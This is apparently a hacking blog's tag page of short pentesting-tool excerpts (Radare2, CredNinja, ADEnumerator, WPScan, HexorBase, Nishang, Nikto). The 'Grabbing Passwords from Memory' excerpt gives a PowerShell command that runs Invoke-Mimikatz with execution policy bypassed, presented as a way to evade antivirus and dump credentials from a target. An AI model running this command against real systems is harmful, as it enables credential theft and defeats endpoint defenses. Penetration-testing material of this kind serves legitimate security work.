Tag: hacking

Disassembling, Radare2, Reversing

Disassembling functions with Radare2

Analyze binary file and its symbols

Method 1:
radare2 -A c:\Windows\SysWOW64\ntdll.dll

Method 2:
radare2 c:\Windows\SysWOW64\ntdll.dll
Inside the radare2 terminal, type: aaa and hit enter.

Disassembling a function

Inside the radare2 terminal, type:
pdf @ sym.ntdll.dll_RtlCreateRegistryKey

You can use tab completion here. Try this instead:
pdf @ sym.ntdll.dll_RtlCreateR
and hit Tab.

SMB

Identify valid credentials within a network

CredNinja is a multithreaded tool designed to identify if credentials are valid, invalid, or local admin valid credentials within a network at-scale via SMB. This tool is intended for penetration testers who want to perform an engagement quickly and efficiently. While this tool can be used for more covert operations (including some additions below), it …

Active Directory

Active Directory enumeration from non-domain system

ADEnumerator allows red teamers to query LDAP with a standard user account from a system not joined to a domain. It’s common that during a red team assessment you will harvest credentials from printers, files, etc. But sometimes you don’t know what these credentials do. Instead of throwing the one set of credentials you got …

Nessus

Nessus _qdb_open: invalid table of contents

1. You start Nessus and you get an error while connecting to https://127.0.0.1:8834.
2. You run nessuscli and you get an error indicating: blah blah _qdb_open: invalid table of contents

Stop the Nessus service:
service nessusd stop

Repair Nessus:
/opt/nessus/sbin/nessusd -R

Start the Nessus service:
service nessusd start

Vulnerabilities

Black box WordPress vulnerability scanner

WPScan is a black box WordPress vulnerability scanner.

WPSCAN ARGUMENTS
--update  Update the database to the latest version.
--url | -u  The WordPress URL/domain to scan.
--force | -f  Forces WPScan to not check if the remote site is running WordPress.
--enumerate | -e [option(s)]  Enumeration. option : u usernames from id 1 to 10 …

Brute-force, Cracking

Bruteforce attacks against common database servers

HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location. It is capable of performing SQL queries and bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL). HexorBase allows packet routing through proxies or even metasploit pivoting antics to communicate with remotely inaccessible …

Penetration Testing, Post-Exploitation

Grabbing Passwords from Memory

* Using PowerShell we can bypass AVs more easily than with mimikatz.exe, which is normally blocked by AVs.
* Upload Invoke-Mimikatz.ps1 (part of the Nishang Framework) to your target.
* Execute remotely:
powershell.exe -ExecutionPolicy Bypass -NonInteractive -Command "Import-Module .\Invoke-Mimikatz.ps1; Invoke-Mimikatz"

Penetration Testing, Post-Exploitation

PowerShell for offensive security

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.

Usage

Import all the scripts in the current PowerShell session:
PS C:\nishang> Import-Module .\nishang.psm1

Use the individual scripts with dot …

Web Penetration Testing

Web Application Pentest

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index …